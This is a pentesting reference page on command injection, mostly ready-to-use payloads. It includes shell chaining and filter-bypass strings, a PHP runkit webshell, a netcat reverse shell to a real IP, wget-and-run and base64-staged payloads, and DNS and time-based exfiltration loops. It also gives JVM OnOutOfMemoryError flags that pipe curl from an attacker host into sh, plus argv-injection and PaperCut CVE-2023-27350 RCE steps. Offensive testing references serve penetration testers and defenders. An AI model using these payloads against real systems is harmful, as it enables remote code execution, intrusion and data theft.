Command Injection

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE). Browse the full HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).

Support HackTricks

What is Command Injection?

Command injection allows an attacker to execute arbitrary operating system commands on the server that hosts the application. As a result, the application and all of its data can be fully compromised. Executing these commands usually lets the attacker gain unauthorised access to, or control over, the application environment and the underlying system.

Context

Depending on where your input is injected, you may need to close the quoted context (using " or ') before the command.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute the 2nd only if the 1st finishes ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2nd
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

PHP rule engines with runkit enabled

Some applications implement admin-only rule engines by executing attacker-supplied PHP. If the environment has the runkit extension enabled, an attacker can redefine or inject functions at runtime, escalating a logic-only rule editor into full PHP RCE.

Indicators:

  • The admin UI accepts PHP-like "rules" that are evaluated.
  • runkit / runkit7 is installed (phpinfo() or extension_loaded('runkit')).

Abuse example (redefine a function used by the rules so that it executes a command):

<?php
runkit_function_redefine('checkBid', '$bid', 'system($_GET["cmd"]); return true;');

If the rule contents are stored and evaluated later, this becomes a persistent RCE primitive in the web context.

Restriction Bypasses

If you are trying to execute arbitrary commands inside a Linux machine, you will be interested in reading about these bypasses:

Bypass Linux Restrictions

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Bash arithmetic evaluation in RewriteMap/CGI-style scripts

RewriteMap helpers written in bash sometimes copy query parameters into globals and later compare them in an arithmetic context ([[ $a -gt $b ]], $((...)), let). Arithmetic expansion re-tokenizes the contents, so attacker-controlled variable names or array references are expanded twice and can lead to command execution.

Example seen in Ivanti EPMM RewriteMap helpers:

  1. Parameters are copied into globals (st → gStartTime, h → theValue).
  2. A later check:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  3. Send st=theValue so that gStartTime contains the string theValue.
  4. Send h=gPath['sleep 5'] so that theValue is evaluated as an array index; during the arithmetic check this runs sleep 5 (replace with a real payload).

Test (~5s delay followed by a 404 if vulnerable):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Notes:

  • Look for the same helper under other prefixes (e.g., /mifs/c/aftstore/fob/).
  • The arithmetic context treats unknown tokens as variable/array identifiers, so this gets past simple metacharacter filters.

Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Extracting data: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin, also hosted at dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Online tools to check for DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

When auditing JavaScript/TypeScript back-ends you will very often run into the Node.js child_process API.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
  /* … */
});

exec() spawns a shell (/bin/sh -c), so every character that has a special meaning to the shell (back-ticks, ;, &&, |, $(), …) leads to command injection when user input is concatenated into the string.

Mitigation: use execFile() (or spawn() without the shell option) and pass each argument as a separate array element so that no shell is involved:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
  '--id_user', id_user,
  '--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was trivially exploitable through an unauthenticated WebSocket event that placed attacker-controlled data into id_user, which was later concatenated into an exec() call, achieving RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with execve/execFile and no shell), many programs will still parse any argument that begins with - or -- as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.

Common places where this shows up:

  • Embedded web UIs / CGI handlers that build commands such as ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Centralized CGI routers (e.g., /cgi-bin/<something>.cgi with a selector parameter like topicurl=<handler>) where many handlers share a single weak validator.

What to try:

  • Supply values starting with -/-- so that the processing tool treats them as flags.
  • Abuse flags that change behaviour or write files, for example:
    • ping: -f/-c 100000 to stress the device (DoS)
    • curl: -o /tmp/x to write arbitrary paths, -K <url> to load an attacker-controlled config
    • tcpdump: -G 1 -W 1 -z /path/script.sh to achieve post-rotate execution in unsafe wrappers
  • If the program supports -- (end-of-options), try to bypass naive mitigations that place -- in the wrong position.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM diagnostic callbacks for authenticated exec

Any sink that lets you inject JVM command-line arguments (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) can be turned into reliable RCE without touching the application's bytecode:

  1. Force a predictable crash by shrinking the metaspace or heap: -XX:MaxMetaspaceSize=16m (or a very small -Xmx). This guarantees an OutOfMemoryError even during early bootstrap.
  2. Attach an error hook: -XX:OnOutOfMemoryError="<cmd>" or -XX:OnError="<cmd>", which runs an arbitrary OS command whenever the JVM aborts.
  3. Optionally add -XX:+CrashOnOutOfMemoryError to skip recovery attempts and make the payload fire once and exit.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Because these diagnostics are parsed by the JVM itself, no shell metacharacters are needed and the command runs at the same integrity level as the launcher. Desktop IPC bugs that pass user-supplied JVM flags through (see Localhost WebSocket abuse) therefore translate directly into OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose /app?service=page/SetupCompleted; opening that page and clicking Login returns a valid JSESSIONID without credentials (authentication bypass in the setup flow).
  • In Options → Config Editor, set print-and-device.script.enabled=Y and print.script.sandboxed=N to enable printer scripting and disable the sandbox.
  • On a printer's Scripting tab, enable the script and leave printJobHook defined to avoid validation errors, but place the payload outside the function so it runs as soon as you click Apply (no print job needed):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a single-command payload first and then exec it with a second request.
  • Horizon3's CVE-2023-27350.py automates the auth bypass, config flips, command execution and rollback; run it through an upstream proxy (e.g., proxychains → Squid) when the service is only reachable internally.

Brute-Force Detection List

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
